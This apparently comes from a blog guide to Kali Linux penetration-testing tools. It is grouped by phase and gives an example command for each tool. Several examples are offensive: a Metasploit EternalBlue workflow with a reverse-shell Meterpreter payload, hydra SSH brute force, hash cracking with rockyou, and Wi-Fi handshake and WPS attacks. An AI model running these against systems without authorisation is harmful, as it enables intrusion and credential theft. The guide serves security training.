thelinuxvault blog

List of Best Kali Linux Tools for Penetration Testing and Hacking

Kali Linux, developed by Offensive Security, is the gold standard for penetration testing, ethical hacking, and cybersecurity research. Pre-installed with over 600 tools, it streamlines the process of identifying vulnerabilities, exploiting systems, and securing networks—when used legally and ethically.

Whether you’re a beginner learning the ropes or a seasoned professional, mastering Kali’s tools is critical for effective penetration testing. This blog breaks down the most essential tools, categorized by their use cases, with detailed explanations, key features, and practical examples to help you get started.

2026-02

Table of Contents#

  1. What is Kali Linux?
  2. Information Gathering Tools
    • Nmap
    • Maltego
    • Recon-ng
  3. Vulnerability Scanning Tools
    • Nessus
    • OpenVAS (Greenbone)
    • Nikto
  4. Exploitation Tools
    • Metasploit Framework
    • Exploit-DB
    • Armitage
  5. Password Attack Tools
    • John the Ripper
    • Hashcat
    • Hydra
  6. Web Application Testing Tools
    • Burp Suite
    • OWASP ZAP
    • Wfuzz
    • DirBuster
  7. Wireless Attack Tools
    • Aircrack-ng
    • Kismet
    • Reaver
  8. Forensics Tools
    • Autopsy
    • Volatility
    • Foremost
  9. Reporting Tools
    • Dradis Framework
    • Metasploit Reporting
    • CherryTree
  10. Conclusion
  11. References

What is Kali Linux?#

Kali Linux is a Debian-based Linux distribution designed explicitly for penetration testing and cybersecurity audits. It replaces BackTrack Linux (its predecessor) and includes tools for every stage of a penetration test: from information gathering to post-exploitation forensics.

Key features of Kali Linux:

  • Pre-installed with 600+ tools for testing, hacking, and forensics.
  • Supports multiple desktop environments (GNOME, KDE, Xfce).
  • Regularly updated with the latest security tools and patches.
  • Legal for ethical use (always obtain written permission before testing systems you don’t own).

Information Gathering Tools#

Information gathering (reconnaissance) is the first phase of penetration testing. It involves collecting data about a target (e.g., IP addresses, open ports, domain details) to identify attack surfaces.

1. Nmap (Network Mapper)#

Description: Nmap is the most widely used network scanning tool. It identifies open ports, services, operating systems, and vulnerabilities on a target network.

Key Features:

  • Port scanning (TCP/UDP).
  • OS detection (using TCP/IP fingerprinting).
  • Service version detection.
  • Scriptable with Nmap Scripting Engine (NSE) for advanced tasks (e.g., vulnerability scanning, brute-forcing).

Use Case: Mapping a network to find open ports and services before launching attacks.

Example Command:

nmap -sV -O -p 1-1000 192.168.1.1  # Scan ports 1-1000, detect service versions (-sV), and OS (-O)

2. Maltego#

Description: Maltego is an open-source intelligence (OSINT) tool that visualizes relationships between entities (e.g., domains, IPs, social media accounts) to uncover hidden connections.

Key Features:

  • Graph-based visualization of data.
  • Pre-built transforms for gathering data from sources like DNS, WHOIS, and Shodan.
  • Supports custom transforms for niche use cases.

Use Case: Investigating a company’s online footprint to find linked domains, employees, or exposed servers.

How to Use:

  1. Launch Maltego from Kali’s Applications menu.
  2. Create a new graph and drag entities (e.g., “Domain”) onto the canvas.
  3. Run transforms to fetch data (e.g., “To IP Addresses” for a domain).

3. Recon-ng#

Description: Recon-ng is an automated reconnaissance framework that uses modules to gather intelligence from APIs, databases, and public sources.

Key Features:

  • Modular architecture (over 100+ modules for DNS, WHOIS, social media, etc.).
  • Report generation in HTML/CSV.
  • Integration with third-party services (e.g., Shodan, VirusTotal).

Use Case: Automating OSINT tasks to collect emails, subdomains, or employee names.

Example Workflow:

recon-ng  # Launch the framework  
marketplace install dnsenum  # Install a DNS enumeration module  
use recon/domains-hosts/dnsenum  # Load the module  
set DOMAIN example.com  # Set target domain  
run  # Execute the module

Vulnerability Scanning Tools#

After gathering information, vulnerability scanners identify weaknesses (e.g., outdated software, misconfigurations) that could be exploited.

1. Nessus#

Description: Nessus is a commercial vulnerability scanner (free for home use) with a vast database of CVEs (Common Vulnerabilities and Exposures).

Key Features:

  • Scans for over 60,000 vulnerabilities.
  • Supports compliance checks (e.g., PCI DSS, HIPAA).
  • Customizable scan policies.

Use Case: Detecting critical vulnerabilities like SQL injection or buffer overflows on a web server.

How to Use:

  1. Download Nessus from tenable.com.
  2. Install and activate the free home license.
  3. Create a scan policy (e.g., “Basic Network Scan”) and target an IP range.

2. OpenVAS (Greenbone Vulnerability Manager)#

Description: OpenVAS (Open Vulnerability Assessment System) is an open-source alternative to Nessus. It’s pre-installed in Kali Linux.

Key Features:

  • Regularly updated vulnerability feed (NVTs: Network Vulnerability Tests).
  • Web-based GUI for easy management.
  • Supports credentialed scans (authenticated testing).

Use Case: Scanning internal networks for missing patches or misconfigured services.

Example Command (to start the service):

sudo gvm-start  # Launches the OpenVAS service and web interface

3. Nikto#

Description: Nikto is a lightweight, command-line tool for scanning web servers for vulnerabilities (e.g., outdated software, misconfigurations, malware).

Key Features:

  • Checks for over 6,700 known vulnerabilities.
  • Supports SSL scans and proxy integration.
  • Generates plaintext/HTML reports.

Use Case: Auditing a web server (Apache, Nginx) for common issues like open directories or outdated plugins.

Example Command:

nikto -h https://example.com -p 443  # Scan port 443 (HTTPS) on example.com

Exploitation Tools#

Exploitation tools use identified vulnerabilities to gain unauthorized access to systems.

1. Metasploit Framework#

Description: The Metasploit Framework is the most popular exploitation tool, with a library of pre-built exploits, payloads, and post-exploitation modules.

Key Features:

  • Exploit database (over 2,000+ exploits).
  • Payloads (e.g., reverse shells, Meterpreter).
  • Post-exploitation modules (e.g., keylogging, privilege escalation).
  • msfconsole: Interactive command-line interface.

Use Case: Exploiting a vulnerability (e.g., EternalBlue) to gain remote access to a Windows machine.

Example Workflow:

msfconsole  # Launch Metasploit  
search eternalblue  # Find the EternalBlue exploit  
use exploit/windows/smb/ms17_010_eternalblue  # Load the exploit  
set RHOSTS 192.168.1.10  # Target IP  
set PAYLOAD windows/x64/meterpreter/reverse_tcp  # Payload to execute  
set LHOST 192.168.1.5  # Your IP (attacker)  
exploit  # Launch the exploit

2. Exploit-DB#

Description: Exploit-DB is a database of public exploits and vulnerabilities, maintained by Offensive Security. It’s integrated into Kali Linux via the searchsploit command.

Key Features:

  • Searchable via CLI (searchsploit).
  • Includes exploit code (Python, C, etc.).
  • Links to CVEs and vulnerability details.

Use Case: Finding an exploit for a specific software version (e.g., “Apache Struts 2.5.10”).

Example Command:

searchsploit "Apache Struts 2.5.10"  # Search for exploits targeting Apache Struts 2.5.10

3. Armitage#

Description: Armitage is a GUI front-end for Metasploit that simplifies exploit management and team collaboration.

Key Features:

  • Visual network mapping of targets.
  • Drag-and-drop exploit execution.
  • Real-time session management (e.g., pivoting between compromised hosts).

Use Case: Managing multiple Metasploit sessions during a penetration test.

How to Use:

  1. Launch Metasploit (msfconsole).
  2. In a new terminal, run armitage to connect to the Metasploit RPC server.

Password Attack Tools#

Password attacks target weak or compromised credentials to gain access to accounts or systems.

1. John the Ripper (John)#

Description: John the Ripper is a fast password-cracking tool that brute-forces or dictionary-attacks hashed passwords (e.g., MD5, SHA-1).

Key Features:

  • Supports multiple hash types.
  • Custom wordlists and rules (e.g., leet speak transformations).
  • GPU acceleration (via OpenCL).

Use Case: Cracking a Linux /etc/shadow file or Windows NTLM hashes.

Example Command:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt  # Crack hashes using the rockyou wordlist

2. Hashcat#

Description: Hashcat is the world’s fastest password cracker, optimized for GPU acceleration. It supports more algorithms than John the Ripper.

Key Features:

  • Over 300+ hash types (e.g., bcrypt, Argon2, Bitcoin).
  • Mask attacks (custom pattern brute-forcing).
  • Benchmarking tools to optimize performance.

Use Case: Cracking modern hashes like bcrypt or PBKDF2.

Example Command:

hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt  # Crack NTLM hashes (-m 1000) with rockyou.txt

3. Hydra#

Description: Hydra is a brute-force tool that attacks network services (e.g., SSH, FTP, HTTP) by trying username/password combinations.

Key Features:

  • Supports 50+ protocols (SSH, RDP, SMTP, etc.).
  • Parallel tasking for speed.
  • Customizable timeout and retry settings.

Use Case: Brute-forcing an SSH server with weak credentials.

Example Command:

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10  # Brute-force SSH with username "admin"

Web Application Testing Tools#

Web apps are prime targets for attacks. These tools identify vulnerabilities like SQL injection, XSS, or CSRF.

1. Burp Suite#

Description: Burp Suite is a web vulnerability scanner and proxy tool, essential for manual web app testing. The free “Community Edition” includes core features; the paid “Professional Edition” adds automated scanning.

Key Features:

  • Proxy: Intercept and modify HTTP/HTTPS requests.
  • Scanner: Automated vulnerability detection (Pro only).
  • Intruder: Brute-force parameters (e.g., usernames, URLs).
  • Repeater: Manually resend and tweak requests.

Use Case: Testing a login form for SQL injection or brute-forcing a password.

How to Use:

  1. Configure your browser to proxy traffic through Burp (default: 127.0.0.1:8080).
  2. Use the “Proxy” tab to intercept requests and the “Intruder” tab to brute-force parameters.

2. OWASP ZAP (Zed Attack Proxy)#

Description: OWASP ZAP is an open-source alternative to Burp Suite, designed for automated and manual web app testing.

Key Features:

  • Automated scanner (finds XSS, SQLi, etc.).
  • Proxy and spider (crawls web apps to map endpoints).
  • Scripting support (JavaScript, Python).

Use Case: Scanning a small web app for common vulnerabilities without a paid license.

Example Workflow:

  1. Launch ZAP and enter a target URL (e.g., http://example.com).
  2. Click “Attack” > “Active Scan” to start automated testing.

3. Wfuzz#

Description: Wfuzz is a web fuzzer that brute-forces parameters (e.g., URLs, form fields) to find hidden resources or vulnerabilities.

Key Features:

  • Custom payload lists (e.g., directories, usernames).
  • Filter responses by status code, size, or content.
  • Recursive scanning.

Use Case: Finding hidden directories (e.g., /admin, /backup) on a web server.

Example Command:

wfuzz -w /usr/share/wordlists/dirb/common.txt http://example.com/FUZZ  # Fuzz for directories using "common.txt"

4. DirBuster#

Description: DirBuster is a GUI tool for brute-forcing web directories and files, ideal for finding hidden paths.

Key Features:

  • Pre-built wordlists (e.g., directory-list-2.3-medium.txt).
  • Custom extensions (e.g., .php, .html).
  • Progress tracking and reports.

Use Case: Enumerating files like config.php or backup.zip on a web server.

Wireless Attack Tools#

Wireless networks (Wi-Fi) are often targets for attacks due to weak encryption or misconfigurations.

1. Aircrack-ng#

Description: Aircrack-ng is a suite of tools for auditing wireless networks, including capturing packets and cracking WEP/WPA/WPA2 keys.

Key Features:

  • airodump-ng: Captures Wi-Fi packets (beacons, handshakes).
  • aircrack-ng: Cracks WEP/WPA keys using wordlists.
  • aireplay-ng: Generates traffic to speed up WEP cracking.

Use Case: Cracking a WPA2-PSK network by capturing the handshake and brute-forcing the password.

Example Workflow:

airodump-ng wlan0mon  # Monitor Wi-Fi networks (start monitor mode first with airmon-ng)  
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon  # Capture handshake for target BSSID on channel 6  
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap  # Crack the handshake

2. Kismet#

Description: Kismet is a wireless network detector, sniffer, and intrusion detection system (IDS). It identifies hidden networks and rogue access points.

Key Features:

  • Passive monitoring (doesn’t send packets, so harder to detect).
  • Supports 802.11 (Wi-Fi), Bluetooth, and Zigbee.
  • Real-time alerts for suspicious activity.

Use Case: Detecting unauthorized access points (rogue APs) in a corporate network.

3. Reaver#

Description: Reaver exploits a vulnerability in WPS (Wi-Fi Protected Setup) to brute-force the WPS PIN, then recover the WPA/WPA2 password.

Key Features:

  • Brute-forces 8-digit WPS PINs (10^8 combinations, but optimized to ~11k attempts).
  • Supports Pixie Dust attack (bypasses PIN lockouts on vulnerable routers).

Use Case: Cracking a WPA2 network with WPS enabled.

Example Command:

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv  # Attack target BSSID with verbose mode (-vv)

Forensics Tools#

Forensics tools help investigate compromised systems, recover data, and analyze evidence post-exploitation.

1. Autopsy#

Description: Autopsy is a GUI-based digital forensics platform that simplifies disk imaging, file recovery, and timeline analysis.

Key Features:

  • Disk imaging (create forensic copies of drives).
  • Keyword search and hash matching (e.g., known bad files).
  • Timeline analysis (track file changes over time).

Use Case: Investigating a compromised Windows laptop to find malware artifacts.

2. Volatility#

Description: Volatility is a memory forensics tool that analyzes RAM dumps to extract running processes, network connections, and malware.

Key Features:

  • Plugins for process listing (pslist), network analysis (netstat), and malware detection (malfind).
  • Supports Windows, Linux, and macOS memory dumps.

Use Case: Identifying a hidden malware process in a suspect’s RAM.

Example Command:

volatility -f memdump.raw --profile=Win7SP1x64 pslist  # List running processes in a Windows 7 x64 memory dump

3. Foremost#

Description: Foremost is a file-carving tool that recovers deleted files (e.g., images, documents) from disk images or raw storage.

Key Features:

  • Supports 40+ file types (JPEG, PDF, ZIP, etc.).
  • Reads raw disks, disk images, or folders.
  • Outputs recovered files to a structured directory.

Use Case: Recovering deleted photos from a USB drive.

Example Command:

foremost -t jpg,pdf -i /dev/sdb1 -o recovered_files  # Recover JPG/PDF files from /dev/sdb1 (USB drive)

Reporting Tools#

Penetration testing isn’t complete without documenting findings. Reporting tools streamline this process.

1. Dradis Framework#

Description: Dradis is a collaborative reporting platform for penetration testers to share notes, evidence, and findings.

Key Features:

  • Template-based reports (e.g., PCI DSS, NIST).
  • Integration with tools like Nmap, Burp Suite, and Nessus.
  • Team collaboration (multi-user support).

Use Case: Creating a client-ready report with vulnerability details, risk scores, and remediation steps.

2. Metasploit Reporting#

Description: Metasploit includes built-in reporting modules to export findings (e.g., HTML, XML) directly from msfconsole.

Example Command:

msfconsole  
db_export -f html report.html  # Export scan/exploit data to HTML

3. CherryTree#

Description: CherryTree is a note-taking tool with hierarchical organization, ideal for jotting down findings, commands, and evidence during testing.

Key Features:

  • Rich text formatting and code blocks.
  • Image and file attachments.
  • Encrypted databases (protect sensitive data).

Conclusion#

Kali Linux’s toolkit empowers ethical hackers and security professionals to identify and mitigate vulnerabilities. However, always use these tools legally and ethically—obtain written permission before testing any system you don’t own.

Mastery comes with practice: start with information gathering (Nmap, Maltego), move to scanning (Nessus, OpenVAS), exploit with Metasploit, and document with Dradis. As the cybersecurity landscape evolves, stay updated with new tools and techniques via resources like Kali Linux Docs and Offensive Security.

References#